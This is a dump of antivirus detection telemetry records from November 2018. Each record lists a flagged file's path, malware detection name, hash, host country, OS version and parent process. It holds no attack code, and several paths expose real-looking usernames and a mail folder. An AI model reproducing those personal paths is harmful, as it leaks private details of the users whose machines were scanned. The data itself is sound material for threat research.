  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T22:36:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171911-a1c34931', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-171911-A1C34931', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:19:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='driverimportpe.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DriverImportPE.exe', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T22:22:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=36000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='677f4309e61b10586c96ec8d6db5505ed2bb91e618f2216fa461d2c269a2d1a4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T17:53:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T22:59:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nskE795.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T14:28:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8ab3', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8ab3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='MM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a22af', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a22af', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:07:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172906-cad85268', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85adc6b7\\AVSCAN-20181104-172748-C40F4DF5\\AVSCAN-20181104-172906-CAD85268', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:28:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fsquirt.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_bth.inf_31bf3856ad364e35_6.1.7600.16385_none_721b1a5f1ce4cd06\\fsquirt.exe', filesize=256000, name='W32/Jeefo.A.#M1.#R1'), hash='37475fdb0adc2ca0d5a7c66987acc9db9a8a90f0c1f30ea6b031849e3daeec45', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:59:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='radb2df7.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\radB2DF7.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00062048', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00062048', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ocs_v71b.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T11:31:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:40:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000794e', filepath='C:\\Windows\\Temp\\71eca46b-f3d3-40e9-8a2f-f6bc3785eca3\\tmp000003b5\\tmp0000794e', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='7cc2bd27f2aff7c6e42fbbaacd945138adaaab477ebcefae500d6efba25999cc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T11:06:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='{baabd31e-c222-4641-b7b3-fbf3920185ca}.{28da80c6-5a45-4e85-9004-5c733fc494e3}', filepath='F:\\\xa0\\{BAABD31E-C222-4641-B7B3-FBF3920185CA}.{28DA80C6-5A45-4E85-9004-5C733FC494E3}', filesize=23560000, name='TR/Crypt.ZPACK.Gen4.#M300.#R300831'), hash='ce29f3553fe03416601191f0acf47b8dde8b690e7332538e6cc6d06d18e3cc51', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:41:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00001233', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00001233', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174237-fde344a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e5b5006\\AVSCAN-20181104-174117-ED7D5097\\AVSCAN-20181104-174237-FDE344A5', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:42:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8cbaaeb386ffec023c4d585d416ff4a7503cb809f153a7f78b522badd4d9e539', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T14:26:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:35:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8a9e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8a9e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:07:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:41:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='0bf06d0a2669a9df10f2d9f9dcd0e08fccd6661c848d90ceb286305bb4f175df', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T21:30:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-070315-5d49dc94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40052757\\AVSCAN-20181104-070207-5245F58C\\AVSCAN-20181104-070315-5D49DC94', filesize=1024000, name='TR/Crypt.XPACK.Gen3.#M1.#R1'), hash='c1320620a503052ee9b43c4eb169b7903e93f24621c91669c59dbc29661671b5', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:03:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T06:11:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='da59fd906ce69f1201e284757333ad81131c300d7b6a01436c02a36b8255ff57', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\DA59FD906CE69F1201E284757333AD81131C300D7B6A01436C02A36B8255FF57', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='da59fd906ce69f1201e284757333ad81131c300d7b6a01436c02a36b8255ff57', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:07:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='luspvgpr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LuSpvgpR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174255-d0df62d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-173734-A423BE75\\AVSCAN-20181102-174255-D0DF62D8', filesize=448000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='bc455e162f6a6a84debe52a76d29b133e00027ab75c47efb47c0d460059a261d', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:41:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15040bii3646501.doc', filepath='/Users/florence/Library/Mail/V6/D461968A-2AAE-48AE-AC7E-ED8EC66B7F79/[Gmail].mbox/All Mail.mbox/8A54D6F7-8305-4C4E-A0D2-02468F9A29A0/Data/5/Attachments/5961/2/15040BII3646501.doc', filesize=64000, name='HEUR/Macro.Downloader.#M5.#R1007'), hash='d1f6e364ef6552ab5a1db415c12743d74cd0ee41b799ec696e615163532931cb', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:28:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-022431-980e732d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-022431-980E732D', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154142-ab7826a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8c64774\\AVSCAN-20181102-154127-A8E2A7C0\\AVSCAN-20181102-154142-AB7826A0', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:42:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062501-b5c4a5ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-062501-B5C4A5BA', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='n.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\SystemMonitor\\n.dll', filesize=9060000, name='PUA/PUA/CPUGuardian.#M1.#R1'), hash='ca7a812237ef6c287bb44e5729273694e0d9108a890fc1f1271589c3d3d335e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:32:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123523-357351ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-122734-FEF1B120\\AVSCAN-20181102-123523-357351EE', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:32:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182437-759b1d37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e02420c3\\AVSCAN-20181102-182347-6BA43A95\\AVSCAN-20181102-182437-759B1D37', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0016765.exe', filepath='\\\\?\\L:\\System Volume Information\\_restore{AE0778D3-AEE6-4B14-9393-AA69173A7867}\\RP27\\A0016765.exe', filesize=9216000, name='TR/Crypt.XPACK.Gen3.#M300.#R200067'), hash='b8377035a28aea457f41d683dbe1bb8a80384791e82bf0195e965edb5258929f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gclaw.exe', filepath='D:\\العاب حسين\\Claw\\gCLAW.EXE', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='f82c8ecd9f5b050b902d7d15f483d434b236ef766cfc036febb2fdc28d6de746', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T01:51:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jp2avi.dll', filepath='C:\\Program Files\\FreeTime\\FormatFactory\\FFModules\\Encoder\\codecs\\jp2avi.dll', filesize=320000, name='W32/Ramnit.C.#M0.#R0'), hash='c23820e07ffb8c5efa576b948eb63e64b04e165d7a886579a6552e7f6a3c42ce', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T06:07:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4play.exe', filepath='D:\\العاب حرب 6 اكتوبر\\4PLAY13\\4PLAY.EXE', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='88da81f62f4ed2fe0be67a057e418823cc331b7e118911f6d9c46d953e7fd8d1', metadata=Row(cmdline='aa011477 38333634303338353136353333373631343838 58', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Game\\SoftnyxGame\\WolfTeamMN\\Wolfteam.bin', parentsize=7464104, timestamp='2018-11-02T19:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/CoinMiner.CZ.#M0.#R0'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:14:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{8308B24D-24B1-4D07-868B-83DB87E48564}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='b0bc04b2ef41cf2611599cc94dbc02bb0ba52afe9e5418254d79ee5325a69976', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ryllozrm.exe', filepath='C:\\Windows\\System32\\lgfmtpmy\\ryllozrm.exe', filesize=11008000, name='HEUR/AGEN.1034238.#M1.#R1'), hash='f7b2598eebb971b1376598a93abf9f3178db6aae0b0f6e8539139c04d4617735', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:44:29Z'), dt=datetime.date(2018, 11, 2)),
